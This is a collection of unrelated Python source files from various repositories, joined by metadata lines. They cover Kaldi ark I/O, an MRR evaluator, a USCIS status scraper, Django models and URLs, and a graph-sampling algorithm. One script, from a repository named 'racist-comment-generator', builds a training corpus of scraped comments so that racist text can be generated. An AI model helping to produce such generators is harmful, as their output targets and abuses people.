# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Basic classes to read/write a binary Kaldi ark file
"""
import struct, numpy
BFM_SYM = b'BFM '
BIV_SYM = b'B'
FEAT_BYTE_SIZE = b'\x04'
NULLC = b'\0'
WAV_SYM = b'RIFF'
class KaldiArkReader:
"""
Base class for readling a Kaldi ark file
"""
def __init__(self, store_image=False):
"""
Constructor of KaldiArkReader
:params store_image: Every utterance data in the ark file will be kept in RAM if True
"""
self.arkfp = None
self.curr_arkfile = None
if store_image == True:# store all the utterance data into image
self.arkdata = {} # arkdata[ID] = {matrix|vector}
self.uttids = [] # remember the order of utterance IDs in an ark file
else:
self.arkdata = None
self.uttids = None
def __enter__(self):
return self
def __iter__(self):
"""
Read each utterance from the ark file and return it
:returns : Python dictionary that contains the utterance ID as a key and data as a value
"""
raise NotImplemented('Implement this')
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def accumulate(self, uttid, dataelem):
"""
Store all the utterance data into the RAM if this is constructed with store_image = True.
"""
if self.arkdata is None:
self.arkdata = {}
self.uttids = []
self.arkdata[uttid] = dataelem
self.uttids.append(uttid)
def open(self, arkfile):
"""
Set the ark file to be read later
"""
if self.arkfp is not None:
raise IOError('call close() first')
self.arkfp = open(arkfile, 'rb')
self.curr_arkfile = arkfile
def close(self):
"""
Close the file pointer if it is opened
"""
if self.arkfp is not None:
self.arkfp.close()
self.arkfp = None
self.curr_arkfile = None
if self.arkdata is not None:
self.arkdata = {}
self.uttids = []
def seek(self, position_in_bytes):
"""
Skip the file pointer. You can pick up the file position from .scp file
"""
if self.arkfp is not None:
self.arkfp.seek(position_in_bytes, 0)
class KaldiFeatArkReader(KaldiArkReader):
"""
Read a Kaldi .feat.ark file per utterance iteratively
"""
def __init__(self, store_image=False):
KaldiArkReader.__init__(self, store_image)
def __iter__(self):
"""
Return a tuple of an utterance ID and feature matrix
where each row vector correpsonds to a feature vector per frame
:returns: (string, numpy.matrix)
"""
uttid = b''
while True:
arkdata = self.arkfp.read(1)
if arkdata == b'':
raise StopIteration('End of feat ark file')
c = struct.unpack('<s', arkdata)[0]
if c == b' ':
arkdata = self.arkfp.read(1) # skip '\0'
arkdata = self.arkfp.read(4) # read the end symbol 'BFM '
endSym = struct.unpack('<4s', arkdata)[0]
if endSym != BFM_SYM:
raise ValueError('ERROR: %s could not find BFM but %s' %(self.curr_arkfile, endSym))
arkdata = self.arkfp.read(1) # skip one byte data '\x04'
arkdata = self.arkfp.read(4) # read no. frames
frameN = struct.unpack( '<I', arkdata )[0]
arkdata = self.arkfp.read(1) # skip one byte data '\x04'
arkdata = self.arkfp.read(4) # read the dimension
featD = struct.unpack( '<I', arkdata )[0]
coeffN = frameN * featD
# read the coefficients
arkdata = self.arkfp.read(coeffN * 4)
feMat = numpy.reshape(struct.unpack('<%df' %(coeffN), arkdata), (frameN,featD))
uttid = uttid.decode()
if self.arkdata is not None:
self.accumulate(uttid, feMat)
uttid2data = {uttid:feMat}
uttid = b''
yield uttid2data
else:
uttid += c
class KaldiIntVectorArkReader(KaldiArkReader):
"""
Read a Kaldi integer-vector file per utterance iteratively
"""
def __init__(self, store_image=False):
KaldiArkReader.__init__(self, store_image)
def __iter__(self):
"""
Return a tuple of an utterance ID and vector
:returns: (string, numpy.vector)
"""
uttid = b''
while True:
arkdata = self.arkfp.read(1)
if arkdata == b'':
break
c = struct.unpack('<s', arkdata)[0]
if c == b' ':
arkdata = self.arkfp.read(1) # skip '\0'
arkdata = self.arkfp.read(1) # read the end symbol 'B'
endSym = struct.unpack('<s', arkdata)[0]
if endSym != BIV_SYM:
raise ValueError('ERROR: %s: Unmatched symbol %s!=%s' %(self.curr_arkfile, endSym, BIV_SYM))
arkdata = self.arkfp.read(1) # skip one byte data '\x04'
arkdata = self.arkfp.read(4) # read no. frames
frameN = struct.unpack('<i', arkdata)[0]
# read the coefficients
vals = []
for i in range(frameN):
arkdata = self.arkfp.read(1)
arkdata = self.arkfp.read(4)
vals.append(struct.unpack('<i', arkdata)[0])
intVec = numpy.array(vals)
uttid = uttid.decode()
if self.arkdata is not None:
self.accumulate(uttid, intVec)
uttid2data = {uttid:intVec}
uttid = b''
yield uttid2data
else:
uttid += c
class KaldiWavArkReader(KaldiArkReader):
"""
Read a Kaldi .wav.ark file per utterance iteratively
"""
def __init__(self, store_image=False):
KaldiArkReader.__init__(self, store_image)
self.riff_header = None
self.samplerate = None
self.num_channels = None
def get_riff_header(self):
return self.riff_header
def get_samplerate(self):
return self.samplerate
def get_num_channel(self):
return self.num_channels
def __iter__(self):
"""
Return a tuple of an utterance ID and audio samples as a 16-bit integer vector
:returns: (string, numpy.int16 vector)
"""
uttid = b''
while True:
arkdata = self.arkfp.read(1)
if arkdata == b'':
raise StopIteration('End of wav ark file')
c = struct.unpack('<s', arkdata)[0]
if c == b' ':
# read the 44 Byte header block of the RIFF file
riff_header = self.arkfp.read(44) # skip '\0'
endSym = struct.unpack('<4s',riff_header[0:4])[0]
dataLength = struct.unpack('<L', riff_header[40:44])[0]
bitsPerSample = struct.unpack('<h', riff_header[34:36])[0]
# nsamps = int(dataLength / (bitsPerSample/8)) # divide 2 (Byte)
self.samplerate = struct.unpack('<L', riff_header[24:28])[0]
self.num_channels = struct.unpack('<h', riff_header[22:24])[0]
if endSym != WAV_SYM:
raise ValueError('ERROR: %s: could not find %s but %s' %(self.curr_arkfile, WAV_SYM, endSym))
if bitsPerSample != 16:
raise ValueError('ERROR: %s: expecting utterance with int16 format but %d bits per sample.' % (self.curr_arkfile, bitsPerSample))
uttBinary = self.arkfp.read(dataLength)
# expecting 16 bit per sample
uttInt = [struct.unpack('<h', uttBinary[i:i+2]) for i in numpy.arange(0,len(uttBinary), 2)]
samples = numpy.array(numpy.int16(numpy.resize(uttInt, (len(uttInt),))))
self.riff_header = riff_header
uttid = uttid.decode()
if self.arkdata is not None:
self.accumulate(uttid, samples)
uttid2data = {uttid:samples}
uttid = b''
yield uttid2data
else:
uttid += c
class KaldiArkWriter:
"""
Base class for writing a Kaldi ark file
"""
def __init__(self):
self.arkfp = None
def __entry__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def open(self, arkfile):
if self.arkfp is not None:
raise IOError('call close() first')
self.arkfp = open(arkfile, 'wb')
def close(self):
if self.arkfp is not None:
self.arkfp.close()
self.arkfp = None
class KaldiFeatArkWriter(KaldiArkWriter):
"""
Write utterance data as a Kaldi .feat.ark file
"""
def __init__(self):
KaldiArkWriter.__init__(self)
def write(self, uttid2feats, uttids=None):
if uttids is None:
uttids = list(uttid2feats.keys())
for uttid in uttids:
feMat = uttid2feats[uttid]
frameN = len(feMat)
featD = len(feMat[0])
outData = b''
for c in uttid + ' ':
outData += struct.pack('<c', c.encode())
outData += struct.pack('<c', NULLC)
for c in BFM_SYM.decode():
outData +=struct.pack('<c', c.encode())
outData += struct.pack('<c', FEAT_BYTE_SIZE)
outData += struct.pack('<I', frameN)
outData += struct.pack('<c', FEAT_BYTE_SIZE)
outData += struct.pack('<I', featD)
self.arkfp.write(outData)
outData = b''
for frameX in range(frameN):
for coeff in feMat[frameX]:
outData += struct.pack('<f', coeff)
self.arkfp.write(outData)
self.arkfp.flush()
class KaldiIntVectorArkWriter(KaldiArkWriter):
"""
Write utterance data as a Kaldi int-vector ark file
"""
def __init__(self):
KaldiArkWriter.__init__(self)
def write(self, uttid2feats, uttids=None):
if uttids is None:
uttids = list(uttid2feats.keys())
for uttid in uttids:
intVec = uttid2feats[uttid]
# write data header
frameN = len(intVec)
outData = b''
for c in uttid + ' ':
outData += struct.pack('<c', c.encode())
outData += struct.pack('<c', NULLC)
for c in BIV_SYM.decode():
outData +=struct.pack('<c', c.encode())
outData += struct.pack('<c', FEAT_BYTE_SIZE)
outData += struct.pack('<I', frameN)
self.arkfp.write(outData)
# write actual vector data
outData = b''
for coeff in intVec:
outData += struct.pack('<c', FEAT_BYTE_SIZE)
outData += struct.pack('<i', coeff)
self.arkfp.write(outData)
self.arkfp.flush()
def correct_chunk_size(numSamples, riff_header):
"""
Correct the data length in header information; see http://soundfile.sapp.org/doc/WaveFormat/ for details
"""
bytesPerSample = struct.unpack( '<h', riff_header[34:36] )[0] // 8
dataLength = numSamples * bytesPerSample
totalChunkSize = 36 + dataLength
return (riff_header[0:4] + struct.pack('<L', totalChunkSize) + riff_header[8:40] + struct.pack('<L', dataLength) + riff_header[44:])
class KaldiWavArkWriter(KaldiArkWriter):
"""
Write utterance data as a Kaldi .wav.ark file
"""
def __init__(self):
KaldiArkWriter.__init__(self)
def write(self, uttid2feats, uttid2headers, uttids=None):
if uttids is None:
uttids = list(uttid2feats.keys())
for uttid in uttids:
outData = b''
for c in uttid + ' ':
outData += struct.pack('<c', c.encode())
self.arkfp.write(outData)
samples = uttid2feats[uttid]
# write the corrected header information
uttid2header = correct_chunk_size(len(samples), uttid2headers[uttid])
self.arkfp.write(uttid2header)
outData = b''
for samp in samples:
outData += struct.pack('<h', samp)
self.arkfp.write(outData)
self.arkfp.flush()
def dump_riff_file(self, riff_file, uttid):
"""
Dump the data in a RIFF file into the wav ark file
"""
outData = b''
for c in uttid + ' ':
outData += struct.pack('<c', c.encode())
self.arkfp.write(outData)
with open(riff_file, 'rb') as riffF:
self.arkfp.write(riffF.read())
self.arkfp.flush()
def test():
import argparse
def build_parser():
parser = argparse.ArgumentParser(description='List utterance IDs in the ark file')
parser.add_argument('-t', '--type', default='f', help='Ark file type (i/f/w)')
parser.add_argument('input_ark', help='input ark path')
parser.add_argument('output_ark', help='output ark path')
return parser
parser = build_parser()
args, argv = parser.parse_known_args()
if args.type == 'f':
reader = KaldiFeatArkReader()
writer = KaldiFeatArkWriter()
elif args.type == 'w':
reader = KaldiWavArkReader()
writer = KaldiWavArkWriter()
else:
reader = KaldiIntVectorArkReader()
writer = KaldiIntVectorArkWriter()
reader.open(args.input_ark)
writer.open(args.output_ark)
for uttid2data in reader:
print(('uttid: %s' %list(uttid2data.keys())[0]))
if args.type == 'w':
writer.write(uttid2data, {list(uttid2data.keys())[0]:reader.get_riff_header()})
else:
writer.write(uttid2data)
reader.close()
writer.close()
if __name__ == '__main__':
test()
| 1.609375 | 2 |
generate_dataset.py | birnbaum/racist-comment-generator | 2 | 12797672 | import mysql.connector
import progressbar
import argparse
import yaml
import re
import collections
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--out', type=str, default='data/racist/racist.txt',
help='text file where the data is written to')
args = parser.parse_args()
with open('config.yml', 'r') as c:
config = yaml.load(c)
generate_dataset(args, config)
def iter_row(cursor, size=1000):
while True:
rows = cursor.fetchmany(size)
if not rows:
break
for row in rows:
yield row
def generate_dataset(args, config):
cnx = mysql.connector.connect(user=config["database"]["user"],
password=config["database"]["password"],
host=config["database"]["host"],
database=config["database"]["db"])
cursor = cnx.cursor()
cursor.execute('SELECT count(*) FROM comment')
count = cursor.fetchone()[0]
bar = progressbar.ProgressBar(max_value=count)
# This query groups comments by posts and places subcomments after their parent comments to
# have as much context between the comments as possible. Everything is sorted ASC by date.
print('Executing SQL query...')
cursor.execute('''
# Parent comments
SELECT p.message,
user.name,
post.created_time as post_created_time,
p.created_time as comment_created_time,
Null as subcomment_created_time
FROM comment p
JOIN user ON user.id = p.user
JOIN post ON post.id = p.post
WHERE p.parent_comment IS NULL
UNION
# Child comments
SELECT c.message,
user.name,
post.created_time as post_created_time,
p.created_time as comment_created_time,
c.created_time as subcomment_created_time
FROM comment c
JOIN user ON user.id = c.user
JOIN comment p on p.id = c.parent_comment
JOIN post ON post.id = p.post
ORDER BY post_created_time ASC,
comment_created_time ASC,
subcomment_created_time ASC
LIMIT 300000
''')
print('Done')
ds = Dataset()
# As people tend to reference other people in subcomments, we collect the names of
# all subcomment authors to remove them from the result in the end.
authors = set()
comments = []
for (message, author, post_date, comment_date, subcomment_date) in bar(iter_row(cursor)):
if subcomment_date is None: # is parent
ds.push(comments, authors)
authors = {author}
comments = [message]
else: # is child
authors.add(author)
comments.append(message)
ds.write(args.out)
class Dataset:
def __init__(self):
self.batches = []
self.vocab_counter = collections.Counter()
def write(self, outfile):
"""Writes the dataset to a text file"""
output = self.create_output()
ending = outfile.split('.')[-1]
if ending == 'txt':
with open(outfile, "wb") as f:
f.write(output)
# TODO add bzip
else:
raise ValueError('outfile has to be a .txt file')
@profile
def push(self, comments, authors):
"""Adds a new bathch of comments to the dataset. The set of authors ist used to further clean the comments"""
lines = []
for comment in comments:
lines.extend(comment.replace('\r', '\n').split('\n'))
txt = ''
authors = [re.escape(author) for author in authors]
for line in lines:
line = self.remove_usernames(line, authors)
if 4 < len(line) < 500:
txt += '> {}\n'.format(line)
self.batches.append(txt)
self.vocab_counter.update(txt)
def remove_usernames(self, text, authors):
"""Removing user names that the crawler was not able to filter out because they were not returned in Graph API's message_tags"""
# First remove the old fashined @ tags
if len(text) == 0 or ('@' in text and len(text.split(' ')) <= 3):
return ''
if text[0] == '@':
text = re.sub('@ ?.*?((:|,|\.| {2})| .*?[:,. ])', '', text)
else:
text = re.sub('@', '', text)
# Then the names of all the authors from the comment and it's subcomments because they mainly reference each other
text = re.sub('({})'.format('|'.join(authors)), '', text)
return text.strip()
@profile
def create_output(self):
"""Generates one big cp1252 string"""
output = ''.join(self.batches)
#Remove all characters that appear in less than 0.002% of the cases
threshold = len(output) * 0.00002
chars_to_remove = []
for char, count in reversed(self.vocab_counter.most_common()):
if count < threshold:
chars_to_remove.append(char)
else:
break
output = re.sub('[' + re.escape(''.join(chars_to_remove)) + ']', '', output)
return output.encode("cp1252", errors="ignore")
def merge_lines(self, lines):
"""Cleans and selects qualifying lines and merges them to a string"""
txt = ''
for line in lines:
line = self.clean_tags(line)
if 4 < len(line) < 500:
txt += '> {}\n'.format(line)
return txt
if __name__ == '__main__':
main() | 1.875 | 2 |
SCODE-R/mrr.py | rizwan09/REDCODER | 22 | 12797680 | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
# Adapted from https://github.com/microsoft/CodeXGLUE/blob/main/Text-Code/NL-code-search-Adv/evaluator/evaluator.py
import logging
import sys, json
import numpy as np
def read_answers(filename):
answers = {}
with open(filename) as f:
for idx, line in enumerate(f):
line = line.strip()
js = json.loads(line)
answers[str(idx)] = str(idx)
return answers
def read_predictions(filename):
predictions = {}
with open(filename) as f:
for idx, line in enumerate(f):
line = line.strip()
js = json.loads(line)
predictions[str(idx)] = js['answers']
return predictions
def calculate_scores(answers, predictions):
scores = []
for key in answers:
# import ipdb
# ipdb.set_trace()
if key not in predictions:
logging.error("Missing prediction for url {}.".format(key))
sys.exit()
flag = False
for rank, idx in enumerate(predictions[key]):
if idx == answers[key]:
scores.append(1 / (rank + 1))
flag = True
break
if flag is False:
scores.append(0)
result = {}
result['MRR'] = round(np.mean(scores), 4)
return result
def main():
import argparse
parser = argparse.ArgumentParser(description='Evaluate leaderboard predictions for POJ-104 dataset.')
parser.add_argument('--answers', '-a', help="filename of the labels, in txt format.")
parser.add_argument('--predictions', '-p', help="filename of the leaderboard predictions, in txt format.")
args = parser.parse_args()
print("reading gold answers")
answers = read_answers(args.answers)
print("reading predcited answers")
predictions = read_predictions(args.predictions)
print("computing scores")
scores = calculate_scores(answers, predictions)
print(scores)
if __name__ == '__main__':
main()
# python mrr.py -a /home/wasiahmad/workspace/projects/NeuralKpGen/data/scikp/kp20k_separated/KP20k.test.jsonl -p /home/rizwan/DPR/predictions_KP20k.jsonl
| 2.359375 | 2 |
uscisstatus/__init__.py | meauxt/uscisstatus | 2 | 12797688 | <filename>uscisstatus/__init__.py
from lxml import html
import re
import requests
from datetime import datetime
CASE_DATE_PATTERN = r"[(A-Za-z)]*\s[\d]*,\s[\d]*"
URL = "https://egov.uscis.gov/casestatus/mycasestatus.do"
APP_RECEIPT_NUM = "appReceiptNum"
INIT_CASE_SEARCH = "initCaseSearch"
CASE_STATUS = "CHECK STATUS"
UPDATE_TEXT_XPATH = "/html/body/div[2]/form/div/div[1]/div/div/div[2]/div[3]/p/text()"
MISSING_URL_PATTEN = "','|', '"
TEXT_FILTER_PATTERN = r"['\[\]]"
def get_case_status(case_id):
data = {APP_RECEIPT_NUM: case_id,
INIT_CASE_SEARCH: CASE_STATUS}
r = requests.post(URL, data=data)
content = html.fromstring(r.content)
text = str(content.xpath(UPDATE_TEXT_XPATH))
if len(text) < 2:
raise ValueError("Please make sure you case id is valid")
text = str(re.sub("','|', '", 'USCIS website', text))
status_message = re.sub(r"['\[\]]", ' ', text)
p = re.search(CASE_DATE_PATTERN, status_message)
if p is not None:
match = p.group(0)
last_update_date = datetime.strptime(str(match), "%B %d, %Y")
last_update_date = last_update_date.strftime('%m/%d/%Y')
return {'status': status_message, 'date': last_update_date}
else:
raise ValueError("Please make sure you case id is valid")
| 1.289063 | 1 |
app/__init__.py | thomasbhatia/kigata | 1 | 12797696 | from . import factory
def create_app(settings_override=None):
# Returns the app API application instance
app = factory.create_app(__name__, __path__, settings_override)
return app
| 1.101563 | 1 |
avaloq/avaloq/urls.py | Tankiolegend/AvaloqCodingWebsite | 0 | 12797704 | from django.contrib import admin
from django.urls import path, include
from avaloq_app import views
urlpatterns = [
path('', views.review, name='review'),
path('avaloq/', include('avaloq_app.urls')),
path('admin/', admin.site.urls),
path('accounts/', include('registration.backends.default.urls')),
]
handler404 = 'avaloq_app.views.page_not_found'
handler500='avaloq_app.views.server_error'
handler400='avaloq_app.views.bad_request'
handler403='avaloq_app.views.permission_denied'
| 1.023438 | 1 |
2016/starter.py | iKevinY/advent | 11 | 12797712 | import os # NOQA
import sys # NOQA
import re # NOQA
import math # NOQA
import fileinput
from collections import Counter, deque, namedtuple # NOQA
from itertools import count, product, permutations, combinations, combinations_with_replacement # NOQA
from utils import parse_line, mul, factors, memoize, primes, new_table, Point # NOQA
# Itertools Functions:
# product('ABCD', repeat=2) AA AB AC AD BA BB BC BD CA CB CC CD DA DB DC DD
# permutations('ABCD', 2) AB AC AD BA BC BD CA CB CD DA DB DC
# combinations('ABCD', 2) AB AC AD BC BD CD
# combinations_with_replacement('ABCD', 2) AA AB AC AD BB BC BD CC CD DD
total = 0
result = []
table = new_table(None, width=2, height=4)
for i, line in enumerate(fileinput.input()):
line = line.strip()
# data = [x for x in line.split(', ')]
# data = [x for x in line]
# data = [int(x) for x in line.split()]
# data = re.findall(r'(\w+)', line)
data = parse_line(r'', line)
if i == 0:
print(data)
| 2.15625 | 2 |
currency_calculator/__init__.py | jie17/PyCurrency | 1 | 12797720 | from .PyCurrency import get, convert | 0.785156 | 1 |
backend/stock/migrations/0024_auto_20210218_2347.py | fengxia41103/stock | 1 | 12797728 | <reponame>fengxia41103/stock<filename>backend/stock/migrations/0024_auto_20210218_2347.py
# Generated by Django 3.1.6 on 2021-02-18 23:47
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('stock', '0023_auto_20210216_1552'),
]
operations = [
migrations.RenameField(
model_name='balancesheet',
old_name='ac',
new_name='ar',
),
migrations.AlterField(
model_name='incomestatement',
name='total_revenue',
field=models.FloatField(blank=True, default=0, null=True, verbose_name='Sales'),
),
migrations.AlterField(
model_name='mystrategyvalue',
name='method',
field=models.IntegerField(choices=[(1, 'daily return'), (2, 'overnight return'), (3, 'night day consistency'), (4, 'two daily trend'), (5, 'night day compounded return')], default=1),
),
]
| 0.683594 | 1 |
sacorg/algorithms/blitzstein_diaconis/blitzstein_diaconis.py | abdcelikkanat/sacorg | 0 | 12797736 | <gh_stars>0
from sacorg.utils import *
from sacorg.algorithms.isgraphical import *
def s(deg_seq):
"""
Generates a sample graph for a given degree sequence d
:param deg_seq: Given degree sequence
:return E, p, c: edges with vertex labels starting from 1,
probability of the generated graph and
the number of edge combinations
"""
# Copy the given degree sequence to use it as residual sequence
r = deg_seq.copy()
p = 1.0 # probability of the generated graph
c = 1 # the number of edge combinations for the same graph that can be generated by the algorithm
E = [] # list of edges
N = len(r) # length of the sequence
adjacentVertices = [[] for _ in range(N)] # stores the vertices which are adjacent
# run until residual sequence completely becomes 0 vector
while np.any(r != 0):
# Get the index of vertex having minimum degree greater than 0
i = np.where(r == np.amin(r[r > 0]))[0][-1]
c *= factorial(r[i])
while r[i] != 0:
J = np.asarray([], dtype=np.int) # Construct candidate list J
possibleVertices = [o for o in np.arange(N) if (r[o] > 0 and o != i and (o not in adjacentVertices[i]))]
for j in possibleVertices:
# Decrease degrees by one
(r[i], r[j]) = (r[i] - 1, r[j] - 1)
# add the the vertex j to candidate list J, if residual sequence is graphical
if is_graphical(r):
J = np.append(J, j)
# Increase degrees by one
(r[i], r[j]) = (r[i] + 1, r[j] + 1)
# Pick a vertex j in the candidate list J with probability proportional to its degree d_j
degrees = np.asarray([r[u] for u in J])
prob = degrees / float(np.sum(degrees))
j = np.random.choice(J, p=prob, size=1)[0]
# Add the found edge to the edge lists
if i < j:
E.append([i + 1, j + 1]) # indices start from 1
else:
E.append([j + 1, i + 1]) # indices start from 1
# Add the chosen vertex to the list in order to not choose it again
adjacentVertices[i].append(j)
# Decrease degrees by 1
(r[i], r[j]) = (r[i] - 1, r[j] - 1)
p *= prob[J == j][0]
# Sort the edge sequences
E.sort()
return E, p, c
def get_sample(deg_seq, num_of_samples, verbose=False):
"""
Generates graphs realizing the degree sequence 'deg_seq' with vertex labels {1,...,len(deg_seq}}
:param deg_seq: Degree sequence
:param num_of_samples: Number of samples which will be generated
:return:
"""
# Get the initial time
time_start = time.clock()
# If the sequence is empty or is not graphical
if len(deg_seq) == 0 or is_graphical(deg_seq) is False:
if verbose is True:
# Get the total computation time
time_elapsed = (time.clock() - time_start)
print "Total computation time : " + str(time_elapsed)
return []
edges = []
for _ in range(num_of_samples):
# Call the s function
e, p, c = s(deg_seq)
# Append the edges
edges.append(e)
# Get the total computation time
time_elapsed = (time.clock() - time_start)
if verbose is True:
print "Total computation time : " + str(time_elapsed)
# Return the edges
return edges
def count(deg_seq, num_of_samples=1000, verbose=False):
"""
Estimates the number of graphs satisfying the degree sequence
:param deq_seq: Degree sequence
:param num_of_samples: number of samples used in estimation
:return estimation, std: Estimation for the number of graphs satisfying the given degree sequence d
and standard deviation
"""
estimate = 0.0
# Get initial time
time_start = time.clock()
# If the sequence is empty or is not graphical
if len(deg_seq) == 0 or is_graphical(deg_seq) is False:
if verbose is True:
# Get the total computation time
time_elapsed = (time.clock() - time_start)
print "Total computation time : " + str(time_elapsed)
return 0.0, 0.0
weights = np.zeros(num_of_samples, dtype=float)
for i in range(num_of_samples):
(edges, p, c) = s(deg_seq)
weights[i] = 1.0 / float(c * p)
estimate = (1.0 / float(num_of_samples)) * np.sum(weights)
std = np.std(weights, ddof=1)
# Get the total computation time
time_elapsed = (time.clock() - time_start)
if verbose is True:
print "Total computation time : " + str(time_elapsed)
return estimate, std | 2.46875 | 2 |
backend/ArrowSelection/Application.py | Ezetowers/tp-final-fallas-I | 0 | 12797744 | import sys, logging, time, random
import web
import json
from intellect.Intellect import Intellect
from MyIntellect import MyIntellect
from Question import Question
from Arrow_Model import Arrow_Model
from Model import Model
class Application(object):
def __init__(self):
# Load the rules
self._myIntellect = MyIntellect()
self._myIntellect.learn(
self._myIntellect.local_file_uri('./rulesets/secondRuleSet.policy'))
def GET(self):
# Habilitate the cross-domain communication
web.header('Access-Control-Allow-Origin', '*')
web.header('Access-Control-Allow-Credentials', 'true')
# Receive the data from the browser and create
# the objects used by the policies
user_data = web.input()
self._model = Model()
self._myIntellect.initialize()
self.set_length( user_data )
self.set_height( user_data )
self.set_poundage( user_data )
self.set_temperature( user_data )
self.set_target_distance( user_data )
self._question = Question()
self._arrow_model = Arrow_Model()
self._myIntellect.learn( self._model )
self._myIntellect.reason()
self._question.number = self._model.question
self._arrow_model.value = self._model.arrow_model
# Send the results to the browser on a json
json_map = { 'question' : self._question.number,
'model' : self._arrow_model.get_model_name() }
return json.dumps( json_map )
def set_length(self, user_data):
try:
self._model.arm_length = int(user_data.longitud)
except AttributeError:
logging.getLogger( 'ArrowSelection' ).error( '[APPLICATION] Arm_Length does not exists' )
def set_height(self, user_data):
try:
self._model.height = int(user_data.altura)
except AttributeError:
logging.getLogger( 'ArrowSelection' ).error( '[APPLICATION] Height does not exists' )
def set_poundage(self, user_data):
try:
self._model.poundage = int(user_data.libraje)
except AttributeError:
logging.getLogger( 'ArrowSelection' ).error( '[APPLICATION] Poundage does not exists' )
def set_temperature(self, user_data):
try:
self._model.temperature = int(user_data.temperatura)
except AttributeError:
logging.getLogger( 'ArrowSelection' ).error( '[APPLICATION] Temperature does not exists' )
def set_target_distance(self, user_data):
try:
self._model.target_distance = int(user_data.distancia)
except AttributeError:
logging.getLogger( 'ArrowSelection' ).error( '[APPLICATION] Target Distance does not exists' )
| 1.484375 | 1 |
backend/django/KlasHelper/model.py | Ryulth/KlasHelperRemaster | 7 | 12797752 | # This is an auto-generated Django model module.
# You'll have to do the following manually to clean this up:
# * Rearrange models' order
# * Make sure each model has one field with primary_key=True
# * Remove `managed = False` lines if you wish to allow Django to create, modify, and delete the table
# Feel free to rename the models, but don't rename db_table values or field names.
#
# Also note: You'll have to insert the output of 'django-admin sqlcustom [app_label]'
# into your database.
from __future__ import unicode_literals
from django.db import models
class Comment(models.Model):
comment_id = models.IntegerField()
class_code = models.CharField(max_length=20)
post_id = models.IntegerField(blank=True, null=True)
create_date = models.DateTimeField(blank=True, null=True)
author_id = models.CharField(max_length=20)
content = models.TextField(blank=True, null=True)
flag = models.IntegerField(blank=True, null=True)
class Meta:
managed = False
db_table = 'comment'
class Course20182(models.Model):
class_code = models.CharField(max_length=20)
class_name = models.CharField(max_length=100)
class_year = models.CharField(max_length=10, blank=True, null=True)
quota = models.CharField(max_length=10, blank=True, null=True)
instructor = models.CharField(max_length=100, blank=True, null=True)
credit = models.CharField(max_length=10, blank=True, null=True)
class_hour_room = models.CharField(max_length=500, blank=True, null=True)
class_type = models.CharField(max_length=20, blank=True, null=True)
class_lan = models.CharField(max_length=50, blank=True, null=True)
notice = models.CharField(max_length=100, blank=True, null=True)
campus = models.CharField(max_length=10, blank=True, null=True)
class Meta:
managed = False
db_table = 'course_2018_20'
class DjangoMigrations(models.Model):
app = models.CharField(max_length=255)
name = models.CharField(max_length=255)
applied = models.DateTimeField()
class Meta:
managed = False
db_table = 'django_migrations'
class Post(models.Model):
post_id = models.IntegerField()
class_code = models.CharField(max_length=20)
author_id = models.CharField(max_length=20)
title = models.CharField(max_length=255)
content = models.TextField(blank=True, null=True)
create_date = models.DateTimeField(blank=True, null=True)
hit = models.IntegerField()
flag = models.IntegerField(blank=True, null=True)
class Meta:
managed = False
db_table = 'post'
class User(models.Model):
klas_id = models.CharField(primary_key=True, max_length=20)
naver_id = models.CharField(max_length=20, blank=True, null=True)
lectures = models.CharField(max_length=512, blank=True, null=True)
name = models.CharField(max_length=20, blank=True, null=True)
class Meta:
managed = False
db_table = 'user'
| 1.101563 | 1 |
bdn/verification/tasks/listen_ethereum_ipfs_hash_storage.py | OpenSourceUniversity/bdn | 1 | 12797760 | import logging
from celery import shared_task
from bdn import contract
from bdn import redis
from .perform_ipfs_meta_verifications_array import (
perform_ipfs_meta_verifications_array)
logger = logging.getLogger(__name__)
@shared_task
def listen_ethereum_ipfs_hash_storage():
redis_db = redis.get_redis()
verification_storage = contract.contract('VerificationStorage')
event = verification_storage.events.Verification
last_block = redis_db.get('_verification_filter_block') or 0
if last_block != 0:
last_block = int(last_block)
hash_filter = event.createFilter(fromBlock=last_block)
for entry in hash_filter.get_all_entries():
block_number = int(entry['blockNumber'])
entry_args = dict(entry['args'])
entry_data = {
'transactionHash': entry['transactionHash'].hex(),
'blockHash': entry['blockHash'].hex(),
'blockNumber': entry['blockNumber'],
'args': {
'ipfsHash': entry_args.get('ipfsHash', b'').decode(),
},
}
perform_ipfs_meta_verifications_array.delay(entry_data)
if block_number > last_block:
redis_db.set('_verification_filter_block', block_number)
| 1.203125 | 1 |
src/flask_bombril/r.py | marcoprado17/flask-bone | 0 | 12797768 | <gh_stars>0
# !/usr/bin/env python
# -*- coding: utf-8 -*-
# ======================================================================================================================
# The MIT License (MIT)
# ======================================================================================================================
# Copyright (c) 2016 [<NAME> - <EMAIL>]
# ======================================================================================================================
class Resources:
def __init__(self):
self.string = self.__Strings()
self.id = self.__Ids()
self.dimen = self.__Dimens()
class __Strings:
def __init__(self):
self.validators = self.__Validators()
self.test_message = "Mensagem de teste"
self.test_message_2 = "Mensagem de teste 2"
self.static = "static"
self.toast = "toast"
self.category_separator = "-"
class __Validators:
def __init__(self):
self.required_field = "Campo obrigatório."
self.invalid_email_format = "Formato de email inválido."
self.email_already_registered = "Email já cadastrado."
self.unique_field = "Valor já registrado."
self.field_min_length_singular = "O campo deve possuir no mínimo %(min_length)d caracter."
self.field_min_length_plural = "O campo deve possuir no mínimo %(min_length)d caracteres."
self.field_max_length_singular = "O campo deve possuir no máximo %(max_length)d caracter."
self.field_max_length_plural = "O campo deve possuir no máximo %(max_length)d caracteres."
self.field_length_range = "O campo deve possuir entre %(min_length)d e %(max_length)d caracteres."
self.invalid_field_name = "Invalid field name '%(field_name)s'."
self.field_must_be_equal_to = "Este campo precisa ser igual ao campo %(other_name)s."
self.always_error = "Essa mensagem de erro sempre será lançada para esse campo"
class __Ids:
def __init__(self):
self.example = "example"
class __Dimens:
def __init__(self):
self.test_int = 42
self.test_int_2 = 17
R = Resources()
| 1.3125 | 1 |
Pyrado/pyrado/tasks/sequential.py | jacarvalho/SimuRLacra | 0 | 12797776 | <filename>Pyrado/pyrado/tasks/sequential.py
import numpy as np
from copy import deepcopy
from typing import Sequence
import pyrado
from pyrado.spaces.base import Space
from pyrado.utils.data_types import EnvSpec
